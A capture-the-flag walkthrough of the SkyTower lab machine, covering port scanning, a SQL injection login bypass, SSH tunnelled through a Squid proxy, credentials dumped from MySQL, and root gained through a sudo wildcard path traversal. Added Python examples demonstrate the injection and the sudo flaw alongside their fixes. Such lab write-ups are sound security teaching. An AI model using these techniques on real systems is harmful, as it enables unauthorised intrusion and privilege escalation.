Looking for the box first:
nmap -Pn -T4 192.168.1.0/24
Nmap scan report for SkyTower.lan (192.168.1.188)
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
3128/tcp open squid-http
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
So let’s run a more intense scan while I check the website:
nmap -p- -sV 192.168.1.188
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-29 14:29 UTC
Nmap scan report for SkyTower.lan (192.168.1.188)
Host is up (0.00044s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
3128/tcp open http-proxy Squid http proxy 3.1.20
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.71 seconds
So let’s go to the website:
The one on 3128 is showing an error message:
Nikto doesn’t reveal a lot:
nikto -h http://192.168.1.188
– Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.188
+ Target Hostname: 192.168.1.188
+ Target Port: 80
+ Start Time: 2019-08-29 14:33:26 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server may leak inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 11:23:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233: /icons/README: Apache default file found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 10 item(s) reported on remote host
+ End Time: 2019-08-29 14:44:30 (GMT0) (664 seconds)
---------------------------------------------------------------------------
I also checked exploitdb for squid but nothing really interesting there.
Gobuster didn't find much either:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.188
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.188
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/08/30 20:03:24 Starting gobuster
===============================================================
/index (Status: 200)
/background (Status: 200)
/background2 (Status: 200)
/server-status (Status: 403)
===============================================================
2019/08/30 20:04:50 Finished
Nothing in the images:
root@kali:~/boxes/skytower# /root/tools/stegextract/stegextract background.jpeg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done
root@kali:~/boxes/skytower# /root/tools/stegextract/stegextract background2.jpeg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done
Checking the login page with Burp:
POST /login.php HTTP/1.1
Host: 192.168.1.188
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.188/
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Connection: close
Upgrade-Insecure-Requests: 1
email='*&password='*
Yep, SQL injection works!
HTTP/1.1 200 OK
Date: Thu, 29 Aug 2019 19:27:42 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Content-Length: 1626
Connection: close
Content-Type: text/html
<HTML>
<div style="height:100%; width:100%;background-image:url('background.jpg');
background-size:100%;
background-position:50% 50%;
background-repeat:no-repeat;">
<div style="
padding-right:8px;
padding-left:10px;
padding-top: 10px;
padding-bottom: 10px;
background-color:white;
border-color: #000000;
border-width: 5px;
border-style: solid;
width: 400px;
height:430px;
position:absolute;
top:50%;
left:50%;
margin-top:-215px; /* this is half the height of your div*/
margin-left:-200px;
">
<br><strong><font size=4>Welcome john@skytech.com</font><br /> </br></strong>As you may know, SkyTech has ceased all international operations.<br><br> To all our long term employees, we wish to convey our thanks for your dedication and hard work.<br><br><strong>Unfortunately, all international contracts, including yours have been terminated.</strong><br><br> The remainder of your contract and retirement fund, <strong>$2</strong> ,has been payed out in full to a secure account. For security reasons, you must login to the SkyTech server via SSH to access the account details.<br><br><strong>Username: john</strong><br><strong>Password: hereisjohn</strong> <br><br> We wish you the best of luck in your future endeavors. <br> </div> </div></HTML>
Good info:
Username: john
Password: hereisjohn
So let’s try with ssh — Oh crap… I can’t… ssh is filtered!
So maybe I can connect using SQUID…
proxytunnel -p 192.168.1.188:3128 -d 127.0.0.1:22 -a 4444
Then open a new terminal and:
ssh john@127.0.0.1 -p 4444 "/bin/bash"
BINGO
ssh john@127.0.0.1 -p 4444 "/bin/bash"
john@127.0.0.1's password:
id
uid=1000(john) gid=1000(john) groups=1000(john)
fg
/bin/sh: 3: fg: No current job
is
/bin/sh: 4: is: not found
ls
whoami
john
id
uid=1000(john) gid=1000(john) groups=1000(john)
Shell is not very good but let’s try to move forward…
Checking home:
ls -al
total 20
drwxr-xr-x 5 root root 4096 Jun 20 2014 .
drwxr-xr-x 24 root root 4096 Jun 20 2014 ..
drwx------ 2 john john 4096 Jun 20 2014 john
drwx------ 2 sara sara 4096 Jun 20 2014 sara
drwx------ 2 william william 4096 Jun 20 2014 william
Nothing… so let’s check the website:
cd /var/www
ls -al
total 5300
drwxr-xr-x 2 root root 4096 Jun 20 2014 .
drwxr-xr-x 12 root root 4096 Jun 20 2014 ..
-rwxr--r-- 1 root root 2831446 Jun 20 2014 background2.jpg
-rwxr--r-- 1 root root 2572609 Jun 20 2014 background.jpg
-rwxr--r-- 1 root root 1136 Jun 20 2014 index.html
-rwxr--r-- 1 root root 2393 Jun 20 2014 login.php
cat login.php
<?php
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');
BINGO:
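The login bypass above, together with the hard-coded root credentials in login.php, reduced to an added example that is not the write-up's or the box's code: a string-built query modelled on the SkyTech `login` table beside its parameterised form. It runs under sqlite3 instead of MySQL, the table rows are the ones later dumped from the database, and the bypass input is constructed rather than the write-up's own `'*` input, whose effect depends on MySQL type coercion that sqlite3 does not reproduce.

```python
import sqlite3

# Constructed stand-in for the SkyTech `login` table (values as shown in the
# write-up's `select * from login`); sqlite3 is used so this runs offline.
ROWS = [
    (1, "john@skytech.com", "hereisjohn"),
    (2, "sara@skytech.com", "ihatethisjob"),
    (3, "william@skytech.com", "senseable"),
]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (id INTEGER, email TEXT, password TEXT)")
    db.executemany("INSERT INTO login VALUES (?, ?, ?)", ROWS)
    return db


def login_vulnerable(db: sqlite3.Connection, email: str, password: str):
    """Query assembled by string formatting: whatever is POSTed becomes SQL.
    Returns the matched email, or None when no row matches."""
    sql = ("SELECT email FROM login WHERE email='%s' AND password='%s'"
           % (email, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db: sqlite3.Connection, email: str, password: str):
    """Parameterised query: the same values are bound, never parsed as SQL,
    so a quote in the input is just a character in the compared string."""
    row = db.execute(
        "SELECT email FROM login WHERE email=? AND password=?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # Constructed tautology input: the vulnerable query degenerates to
    # WHERE email='' OR 1=1 and hands back the first row, john, exactly the
    # account the write-up's injected request was greeted as.
    bypass = "' OR 1=1 -- "
    print("vulnerable:", login_vulnerable(db, bypass, "x"))   # john@skytech.com
    print("safe:      ", login_safe(db, bypass, "x"))         # None
```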
OK, I'm fed up with this crappy shell…
/bin/sh -i
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(john) gid=1000(john) groups=1000(john)
$
ok now we’re talking!!!!!
So I uploaded and ran LinEnum:
[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
NAME="Debian GNU/Linux"
VERSION_ID="7"
VERSION="7 (wheezy)"
ID=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support/"
BUG_REPORT_URL="http://bugs.debian.org/"
Kind of strange to see that mysql is not running:
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 10648 812 ? Ss 17:29 0:00 init [2]
root 2 0.0 0.0 0 0 ? S 17:29 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 17:29 0:00 [ksoftirqd/0]
root 6 0.0 0.0 0 0 ? S 17:29 0:00 [migration/0]
root 7 0.0 0.0 0 0 ? S 17:29 0:00 [watchdog/0]
root 8 0.0 0.0 0 0 ? S< 17:29 0:00 [cpuset]
root 9 0.0 0.0 0 0 ? S< 17:29 0:00 [khelper]
root 10 0.0 0.0 0 0 ? S 17:29 0:00 [kdevtmpfs]
root 11 0.0 0.0 0 0 ? S< 17:29 0:00 [netns]
root 12 0.0 0.0 0 0 ? S 17:29 0:00 [sync_supers]
root 13 0.0 0.0 0 0 ? S 17:29 0:00 [bdi-default]
root 14 0.0 0.0 0 0 ? S< 17:29 0:00 [kintegrityd]
root 15 0.0 0.0 0 0 ? S< 17:29 0:00 [kblockd]
root 17 0.0 0.0 0 0 ? S 17:29 0:00 [khungtaskd]
root 18 0.0 0.0 0 0 ? S 17:29 0:00 [kswapd0]
root 19 0.0 0.0 0 0 ? SN 17:29 0:00 [ksmd]
root 20 0.0 0.0 0 0 ? S 17:29 0:00 [fsnotify_mark]
root 21 0.0 0.0 0 0 ? S< 17:29 0:00 [crypto]
root 98 0.0 0.0 0 0 ? S< 17:29 0:00 [ata_sff]
root 103 0.0 0.0 0 0 ? S 17:29 0:00 [khubd]
root 118 0.0 0.0 0 0 ? S 17:29 0:00 [scsi_eh_0]
root 119 0.0 0.0 0 0 ? S 17:29 0:00 [scsi_eh_1]
root 120 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/u:1]
root 121 0.0 0.0 0 0 ? S 17:29 0:00 [scsi_eh_2]
root 122 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/u:2]
root 126 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/0:2]
root 153 0.0 0.0 0 0 ? S 17:29 0:00 [jbd2/sda1-8]
root 154 0.0 0.0 0 0 ? S< 17:29 0:00 [ext4-dio-unwrit]
root 297 0.0 0.2 21380 1356 ? Ss 17:29 0:00 udevd --daemon
root 396 0.0 0.2 21376 1052 ? S 17:29 0:00 udevd --daemon
root 397 0.0 0.1 21376 1008 ? S 17:29 0:00 udevd --daemon
root 415 0.0 0.0 0 0 ? S< 17:29 0:00 [kpsmoused]
root 417 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/0:3]
root 1697 0.0 0.0 0 0 ? S 17:29 0:00 [flush-8:0]
root 1819 0.0 0.3 52776 1532 ? Sl 17:29 0:00 /usr/sbin/rsyslogd -c5
root 1853 0.0 0.1 4116 636 ? Ss 17:29 0:00 /usr/sbin/acpid
root 1889 0.0 1.8 154280 9464 ? Ss 17:29 0:00 /usr/sbin/apache2 -k start
root 1932 0.0 0.2 20408 1040 ? Ss 17:29 0:00 /usr/sbin/cron
www-data 1964 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1965 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1966 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1967 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1968 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
root 2015 0.0 0.5 49956 2912 ? Ss 17:29 0:00 /usr/sbin/squid3 -YC -f /etc/squid3/squid.conf
root 2090 0.0 0.1 16256 944 tty1 Ss+ 17:29 0:00 /sbin/getty 38400 tty1
root 2091 0.0 0.1 16256 944 tty2 Ss+ 17:29 0:00 /sbin/getty 38400 tty2
root 2092 0.0 0.1 16256 940 tty3 Ss+ 17:29 0:00 /sbin/getty 38400 tty3
root 2093 0.0 0.1 16256 940 tty4 Ss+ 17:29 0:00 /sbin/getty 38400 tty4
root 2094 0.0 0.1 16256 948 tty5 Ss+ 17:29 0:00 /sbin/getty 38400 tty5
root 2095 0.0 0.1 16256 944 tty6 Ss+ 17:29 0:00 /sbin/getty 38400 tty6
root 2106 0.0 0.5 9960 2576 ? Ss 17:30 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root 2147 0.0 0.2 49932 1212 ? Ss 17:30 0:00 /usr/sbin/sshd
proxy 2174 0.0 3.2 86988 16288 ? S 17:48 0:00 (squid) -YC -f /etc/squid3/squid.conf
proxy 2175 0.0 0.2 20100 1052 ? S 17:48 0:00 (unlinkd)
root 2176 0.0 0.6 69216 3508 ? Ss 17:48 0:00 sshd: john [priv]
john 2178 0.0 0.3 69216 1720 ? S 17:48 0:00 sshd: john@notty
john 2179 0.0 0.2 10752 1360 ? Ss 17:48 0:00 /bin/bash
john 2194 0.0 0.1 4180 640 ? S 17:56 0:00 /bin/sh -i
root 2204 0.0 0.0 0 0 ? S 18:00 0:00 [kworker/0:0]
john 2215 0.0 0.3 11332 1992 ? S 18:04 0:00 /bin/bash ./linenum.sh -t
john 2216 0.1 0.2 11356 1508 ? S 18:04 0:00 /bin/bash ./linenum.sh -t
john 2217 0.0 0.1 5596 652 ? S 18:04 0:00 tee -a
john 2439 0.0 0.2 11356 1212 ? S 18:04 0:00 /bin/bash ./linenum.sh -t
john 2440 0.0 0.2 16836 1268 ? R 18:04 0:00 ps aux
### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
[-] SGID files:
-rwxr-sr-x 1 root shadow 54904 May 25 2012 /usr/bin/chage
-rwxr-sr-x 1 root tty 14624 Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root tty 23056 Dec 11 2012 /usr/bin/wall
-rwxr-sr-x 1 root ssh 129088 Apr 2 2014 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 23312 May 25 2012 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 35880 Jul 3 2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 35408 Apr 29 2012 /sbin/unix_chkpwd
TROLL:
$ cat /etc/issue
Welcome to the SkyTower, try to gain access
to the flag.txt file in the /root/ directory
OK… going nowhere for now, and with no TTY it's painful…
Let’s try to fix this:
ssh -t john@127.0.0.1 -p 4444 "/bin/sh"
Yeah… better!!!
But there’s something still wrong…
So let’s check the login process:
.bashrc has an exit statement, so I deleted the file and logged in again…
Better! Now I have a real TTY.
Going back to mysql with the credentials I found (root/root):
mysql> select * from login;
+----+---------------------+--------------+
| id | email               | password     |
+----+---------------------+--------------+
|  1 | john@skytech.com    | hereisjohn   |
|  2 | sara@skytech.com    | ihatethisjob |
|  3 | william@skytech.com | senseable    |
+----+---------------------+--------------+
Trying to log in as sara, removing .bashrc at the same time just in case:
john@SkyTower:~$ ssh sara@localhost "rm .bashrc"
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/john/.ssh/known_hosts).
sara@localhost's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
sudo -l
Matching Defaults entries for sara on this host:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sara may run the following commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
sara@SkyTower:~$ sudo ls /accounts/../root
flag.txt
sara@SkyTower:~$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
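The sudo rule above, as an added example that is not from the write-up: a small Python model of why `(root) NOPASSWD: /bin/cat /accounts/*` also permits `/accounts/../root/flag.txt`. sudo matches the argument as a plain glob in which `*` also matches `/` and `..`, whereas the check the rule's author wanted is a path-confinement test; the request paths below are constructed.

```python
import fnmatch
import posixpath

# The argument glob exactly as `sudo -l` reported it for sara, and the
# directory the rule was evidently meant to confine her to.
RULE_ARG_GLOB = "/accounts/*"
INTENDED_DIR = "/accounts"


def sudo_glob_allows(requested_path: str, arg_glob: str = RULE_ARG_GLOB) -> bool:
    """sudo-style argument matching: '*' is an ordinary fnmatch wildcard and
    matches '/' and '..' too, so the raw string the user typed is compared."""
    return fnmatch.fnmatchcase(requested_path, arg_glob)


def stays_inside(requested_path: str, base_dir: str = INTENDED_DIR) -> bool:
    """What the rule's author intended: the resolved path must stay under
    base_dir. normpath collapses '..' lexically; a wrapper script on a real
    system should also use os.path.realpath so symlinks cannot escape."""
    resolved = posixpath.normpath(requested_path)
    base = base_dir.rstrip("/")
    return resolved == base or resolved.startswith(base + "/")


def audit(requested_path: str) -> dict:
    """Compare what sudo would grant with what a confinement check would grant;
    'traversal' is True when the two disagree in the attacker's favour."""
    allowed = sudo_glob_allows(requested_path)
    inside = stays_inside(requested_path)
    return {
        "path": requested_path,
        "sudo_allows": allowed,
        "inside_dir": inside,
        "traversal": allowed and not inside,
    }


if __name__ == "__main__":
    # Constructed requests: a legitimate one, the write-up's escape, a deeper
    # escape, and a path the glob never matched in the first place.
    for p in ("/accounts/sara.txt", "/accounts/../root/flag.txt",
              "/accounts/x/../../etc/shadow", "/root/flag.txt"):
        print(audit(p))
```

The usual fix is to drop the wildcard and let sudo run a wrapper script that applies the `stays_inside` check to its argument before calling cat.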
Then… easy:
su -
Password:
root@SkyTower:~# whoami
root
This one was not like the other machine… I found it tricky!